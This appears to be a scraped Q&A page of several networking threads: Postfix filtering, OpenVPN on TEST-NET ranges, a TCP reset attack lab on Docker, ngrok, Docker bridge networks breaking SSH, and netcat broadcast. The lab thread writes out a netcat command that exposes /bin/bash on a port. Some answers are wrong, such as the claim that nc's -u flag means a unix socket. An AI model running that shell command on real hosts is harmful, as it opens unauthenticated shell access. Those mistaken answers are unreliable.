I am using a postfix hook to check every mail with a bash script.
I have this line in my master.cf
smtp inet n - y - - smtpd -o content_filter=myhook:dummy
My script is also called for outgoing emails, I want that the script is just called when I receive any email. How can I configure this?
Best regards
My guess is that your incoming and outgoing emails are sent to Postfix through the same process (smtpd using the smtp port: 25).
So the content_filter is applied either way
One way to achieve your goal is to use another smtpd process listening on an other port without the content_filter. In the master.cf:
smtp inet n - y - - smtpd -o content_filter=myhook:dummy
1025 inet n - y - - smtpd
With this configuration:
Every mail sent to the port 25 is filtered.
Every mail sent to the port 1025 is not filtered
Related
Background
I have a strange use-case where my VPN cannot be on any of the private subnets, but, also cannot use a TAP interface. The machine will be moving through different subnets, and requires access to the entire private address space by design. A single blocked IP would be considered a failure of design.
So, these are all off limits:
10.0.0.0/8
172.16.0.0/12
192.168.0.0/16
169.254.0.0/16
In searching for a solution, I came across RFC 5735, which defines:
192.0.2.0/24 TEST-NET-1
198.51.100.0/24 TEST-NET-2
203.0.113.0/24 TEST-NET-3
As:
For use in documentation and example code. It is often used in conjunction with domain names
example.com or example.net in vendor and protocol documentation. As described in [RFC5737], addresses within this block do not legitimately appear on the public Internet and can be used without any coordination with IANA or an Internet registry.
Which, was a "Jackpot" moment for me and my use case.
Config
I configured an OpenVPN server as such:
local 0.0.0.0
port 443
proto tcp
dev tun
topology subnet
server 203.0.113.0 255.255.255.0 # TEST-NET-3 RFC 5735
push "route 203.0.113.0 255.255.255.0"
...[Snip]...
With Client:
client
nobind
dev tun
proto tcp
...[Snip]...
And ufw rules:
:POSTROUTING ACCEPT [0:0]
-A POSTROUTING -s 203.0.113.0/24 -o ens160 -j MASQUERADE
COMMIT
However, upon running I get /sbin/ip route add 203.0.113.0/24 via 203.0.113.1 RTNETLINK answers: File exists in the error logs. While the VPN completes the rest of its connection successfully.
No connection
Running the following commands:
Server: sudo python3 -m http.server 80
Client: curl -X GET / 203.0.113.1
Results in:
curl: (28) Failed to connect to 203.0.113.1 port 80: Connection timed out
I have tried:
/sbin/ip route replace 203.0.113.0/24 dev tun 0 on client and server.
/sbin/ip route change 203.0.113.0/24 dev tun 0 on client and server.
Adding route 203.0.113.0 255.255.255.0 to the server.
Adding push "route 203.0.113.0 255.255.255.0 127.0.0.1" to server
And none of it seems to work.
Does anyone have any idea how I can force the client to push this traffic over the VPN to my server, instead of to the public IP?
This does actually work!
Just dont forget to allow connections within your firewall. I fixed my config with:
sudo ufw allow in on tun0
However, 198.18.0.0/15 and 100.64.0.0/10 defined as Benchmarking and Shared address space respectively, may be more appropriate choices, since being able to forward TEST-NET addresses may be considered a bug.
Currently, I am trying to create a TCP Reset Attack on 3 docker containers: Attacker, Host01, Host02. My goal is trying to attack the TCP connection between Host01 and Host02 and the end result would be the TCP connection breaks when executing the TCP reset attack.
Here is my code:
My procedure of testing is that: First, I run the code below in Attacker container. Then, on the Host02, I execute "nc -lvp 1337 -e /bin/bash" and on Host01, I execute "nc 192.168.124.20 1337". The source IP is 192.168.124.10 and the destination is 192.168.124.20. Source port is 40967 and the destination port is 1337.
I didn't know why when the script ran, the TCP connection between Host01 and Host02 did not break since I could still enter some commands from Host01.
I used Wireshark to check if that RST packet was sent and actually it was sent(the red line):
Please help me on this, Huy Nguyen.
I was wondering if there's a way to assign a specific port using TCP to the URL that ngrok generates.
i tried with config.yml file, it has this code but it doesn't work
tunnels:
blueiris:
remote_port: 5666
proto: tcp
addr: 123
it generates this URL: Forwarding tcp://0.tcp.ngrok.io:18777 -> localhost:123
the port of the localhost pretty much it doesn't matter. I wan't to assign the port 5666 to the URL 0.tcp.ngrok.io so it can be: 0.tcp.ngrok.io:5666
Thanks.
I need help understanding my networking logs due to docker-compose networking.
I'm ssh'd into a VM, and I have two projects with docker-compose. The first is launched simply with docker-compose up. When I try to launch the second, my ssh session freezes, and I can no longer ssh into the VM. After lots of trial and error, and after reading this I tried to append to my 2nd project's docker-compose.yml file the following:
networks:
default:
external:
name: abcdef_default
where abcdef_default is the name of the network created by docker-compose up of the 1st project. With this, the docker-compose up on the 2nd project doesn't kick me out of the ssh session.
I tailed the logs in /var/log/*.log, and here's the output with the networks section in the docker-compose.yml file (without the timestamp prefix: Jan 19 09:13:42 hostname kernel: [420096.305357]):
aufs au_opts_verify:1597:dockerd[13813]: dirperm1 breaks the protection by the permission bits on the lower branch
device veth6a84537 entered promiscuous mode
IPv6: ADDRCONF(NETDEV_UP): veth6a84537: link is not ready
eth0: renamed from veth2480623
IPv6: ADDRCONF(NETDEV_CHANGE): veth6a84537: link becomes ready
br-fe0deb0149df: port 18(veth6a84537) entered forwarding state
br-fe0deb0149df: port 18(veth6a84537) entered forwarding state
aufs au_opts_verify:1597:dockerd[25317]: dirperm1 breaks the protection by the permission bits on the lower branch
device veth1a3c1e3 entered promiscuous mode
IPv6: ADDRCONF(NETDEV_UP): veth1a3c1e3: link is not ready
br-fe0deb0149df: port 22(veth1a3c1e3) entered forwarding state
br-fe0deb0149df: port 22(veth1a3c1e3) entered forwarding state
eth0: renamed from veth54e576d
IPv6: ADDRCONF(NETDEV_CHANGE): veth1a3c1e3: link becomes ready
br-fe0deb0149df: port 22(veth1a3c1e3) entered disabled state
veth54e576d: renamed from eth0
br-fe0deb0149df: port 22(veth1a3c1e3) entered disabled state
device veth1a3c1e3 left promiscuous mode
br-fe0deb0149df: port 22(veth1a3c1e3) entered disabled state
br-fe0deb0149df: port 18(veth6a84537) entered forwarding state
and here's the output without the networks section (i.e. when I get kicked out of the ssh session):
IPv6: ADDRCONF(NETDEV_UP): br-55349b03453a: link is not ready
aufs au_opts_verify:1597:dockerd[26982]: dirperm1 breaks the protection by the permission bits on the lower branch
aufs au_opts_verify:1597:dockerd[26982]: dirperm1 breaks the protection by the permission bits on the lower branch
aufs au_opts_verify:1597:dockerd[3051]: dirperm1 breaks the protection by the permission bits on the lower branch
device veth7a1bcde entered promiscuous mode
IPv6: ADDRCONF(NETDEV_UP): veth7a1bcde: link is not ready
br-55349b03453a: port 1(veth7a1bcde) entered forwarding state
br-55349b03453a: port 1(veth7a1bcde) entered forwarding state
br-55349b03453a: port 1(veth7a1bcde) entered disabled state
eth0: renamed from veth5d8a2ea
IPv6: ADDRCONF(NETDEV_CHANGE): veth7a1bcde: link becomes ready
br-55349b03453a: port 1(veth7a1bcde) entered forwarding state
br-55349b03453a: port 1(veth7a1bcde) entered forwarding state
IPv6: ADDRCONF(NETDEV_CHANGE): br-55349b03453a: link becomes ready
aufs au_opts_verify:1597:dockerd[13814]: dirperm1 breaks the protection by the permission bits on the lower branch
aufs au_opts_verify:1597:dockerd[13814]: dirperm1 breaks the protection by the permission bits on the lower branch
aufs au_opts_verify:1597:dockerd[13922]: dirperm1 breaks the protection by the permission bits on the lower branch
device veth3253bd4 entered promiscuous mode
IPv6: ADDRCONF(NETDEV_UP): veth3253bd4: link is not ready
br-55349b03453a: port 2(veth3253bd4) entered forwarding state
br-55349b03453a: port 2(veth3253bd4) entered forwarding state
br-55349b03453a: port 2(veth3253bd4) entered disabled state
eth0: renamed from veth9c8aaa3
IPv6: ADDRCONF(NETDEV_CHANGE): veth3253bd4: link becomes ready
br-55349b03453a: port 2(veth3253bd4) entered forwarding state
br-55349b03453a: port 2(veth3253bd4) entered forwarding state
br-55349b03453a: port 2(veth3253bd4) entered disabled state
veth9c8aaa3: renamed from eth0
br-55349b03453a: port 2(veth3253bd4) entered disabled state
device veth3253bd4 left promiscuous mode
br-55349b03453a: port 2(veth3253bd4) entered disabled state
br-55349b03453a: port 1(veth7a1bcde) entered forwarding state
br-55349b03453a: port 1(veth7a1bcde) entered disabled state
veth5d8a2ea: renamed from eth0
br-55349b03453a: port 1(veth7a1bcde) entered disabled state
device veth7a1bcde left promiscuous mode
br-55349b03453a: port 1(veth7a1bcde) entered disabled state
I don't really understand how to read these logs.
Here is my ifconfig also.
Can someone help me read the logs and figure out what the problem is?
Diagnosis
Our team is using AWS EC2 instances running Ubuntu 18.04 as devservers. We recently got reports that docker-compose broke SSH connections. Even after restarting, the devservers are still inaccessible. So I started investigation.
I was able to exclude the cause of docker-compose by reproducing using docker only.
ubuntu#ip-172-31-115-116:~$ docker network create -d bridge my-bridge-network
aca5884d60f146cef81ac55c8cccd231a43f40927d645168642d9b28c5e009a6
ubuntu#ip-172-31-115-116:~$ docker network prune
WARNING! This will remove all custom networks not used by at least one container.
Are you sure you want to continue? [y/N] y
Deleted Networks:
my-bridge-network
ubuntu#ip-172-31-115-116:~$ docker network create -d bridge my-bridge-network
f0a7a06a9627bc2de00eb60091a92010451690626d95e077f622f3058cc3a07c
ubuntu#ip-172-31-115-116:~$ docker network prune
WARNING! This will remove all custom networks not used by at least one container.
Are you sure you want to continue? [y/N] y
Deleted Networks:
my-bridge-network
ubuntu#ip-172-31-115-116:~$ docker network create -d bridge my-bridge-network
Connection reset by 172.31.115.116 port 22
Then the root cause occurred to me.
Root cause
Our docker-compose files are using the bridge network mode which will create a new bridge network by default. When docker-compose down or docker network prune is run, the bridge network will be torn down. And the next docker-compose run or docker network create will create a new bridge network.
The default IP range for the docker0 bridge adapter is 172.17.0.0/16.
When I first ran the docker network create -d bridge my-bridge-network command, it created a new bridge adapter for 172.18.0.0/16.
The second bridge adapter was created for 172.19.0.0/16.
Naturally, the 3rd bridge adapter is created for 172.20.0.0/16. However, that is our Engineering VPN IP range. Therefore the overlap caused the server unable to communicate with our laptop.
Solutions
The solution is to make sure new docker bridge networks will skip our VPN IP range.
Temp solution
If we add the skipped IP ranges to system route table, docker will automatically skip them. Therefore, we can run the below script whenever the devserver got rebooted.
sudo route add -net [our VPN IP range] netmask 255.255.0.0 gw [our gateway]
This solution is imperfect that the new routes will be discarded after restarting the machine.
Main solution
We should permanently apply the route changes to all devservers.
echo " routes:" | sudo tee -a /etc/netplan/50-cloud-init.yaml
echo " - to: [our VPN IP range]" | sudo tee -a /etc/netplan/50-cloud-init.yaml
echo " via: [our gateway]" | sudo tee -a /etc/netplan/50-cloud-init.yaml
sudo netplan apply
Docker IP changes
We also plan to modify the docker default-address-pools to redefine docker IP ranges. Refer to https://github.com/docker/compose/issues/4336#issuecomment-457326123. I would say modifying /etc/docker/daemon.json is better.
br-xxxxxxx are the bridge interfaces of Docker and vethxxxxxxx are the virtual interfaces of your containers, Docker use those veth interfaces but you do not directly interact on it, they use an IPv6 address and don't have IPv4. Docker can't create NAT interfaces, it can only create bridge and veth with IPv6 for containers. You can link your bridge to any physical or virtual interface of your host.
So it work like that:
eth0 (your interface or v-interface if you want) ↔ brxxxxx(docker bridge) ↔ vethxxxxx (v-interface of your container)
It's all I can say, I'm not sure that someone else will answer, there is not a lot of Docker experts, so I give you all informations I can to help you to understand your logs.
I finally ended up running a docker network ls. The output was a list of more than 15 networks which were very old. I ran a docker ps to make sure that nothing related to these networks was still running. One container was indeed still running (redis) and it was on a network called bridge. I stopped the container. Then I started going through all the networks with docker network rm <network name> until I was left with 4 networks: bridge, host, none, and the only network that was still working. Then I could start new networks with docker-compose up again as usual
I had the same issue, I solved it by setting the network_mode option on docker compose (see the docs here. The solution came from this thread ).
services:
my_service:
image: ...
network_mode: "host"
I'm trying to send a broadcast message using netcat.
I have firewalls open and sending a regular message like this works for me:
host: nc -l 192.168.1.121 12101
client: echo "hello" | nc 192.168.1.121 12100
But I can't get something like this to work.
host: nc -lu 0.0.0.0 12101
client: echo "hello" | nc -u 255.255.255.255 12100
Am I using the right flags? Note, the host is on Mac and the client on Linux. Can you give me an example that works for broadcasting a message?
Thanks!
The GNU version of netcat might be broken. (I can't get to work under 0.7.1 anyway.) See http://sourceforge.net/p/netcat/bugs/8/
I've gotten socat to work. Code below does UDP broadcast to port 24000.
socat - UDP-DATAGRAM:255.255.255.255:24000,broadcast
(In socat-world "-" means "stdin".)
You're not saying you want to broadcast, which is done using the -b option to nc/netcat.
nc -h 2>&1 | grep -- -b
-b allow broadcasts
A simple example that works on Ubuntu. All the info in is in the other answers, but I had to piece it together, so thought I would share the result.
server
nc -luk 12101
client
echo -n "test data" | nc -u -b 255.255.255.255 12101
The client will hang until you do Ctrl-C
Sorry, if I am assuming wrong but you mentioned that you have your firewalls set up correctly so I am guessing that the host and client are not on the same subnet???
If that is the case and this firewall is also acting also as a router (or if the packet has to go through a router) then it is going to process that packet but it will not forward it out its other interfaces. If you wanted that to happen then you would need to send a directed broadcast. For example; for the subnet 192.168.1.0/24 the directed broadcast would be 192.168.1.255, the last IP in the subnet. Then the firewall, assuming it had a route to 192.168.1.0/24 and that it is set up to forward directed broadcast, would forward that broadcast out to the destination or next hop. Configuring your device to forward directed broadcast... you would need to reference its documentation. For Cisco IOS you would type in, under the interface, "ip directed-broadcast".
255.255.255.255 is a limited broadcast and is not going to get pass your routers regardless, it is solely intended for the layer 2 link that it resides.
As for how netcat is set up:
-l 0.0.0.0 12101, tells netcat to listen on port 12101 on all interfaces that are up and with an IP address assigned. The -u is not needed as it is telling netcat to listen on a unix domain socket, google IPC :) (this is the biggest reason that your scenario is not working.)
The below should work to get a broadcast forwarded to another network via netcat:
server: nc -l 0.0.0.0 12101
host: echo "hello" | nc 192.168.1.255 12101
Hope that helps, sorry if that was long winded or off from what you were looking for :)